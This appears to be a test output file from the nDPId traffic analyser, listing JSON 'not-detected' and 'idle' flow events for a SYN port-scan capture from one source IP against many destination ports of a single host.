+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1131,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 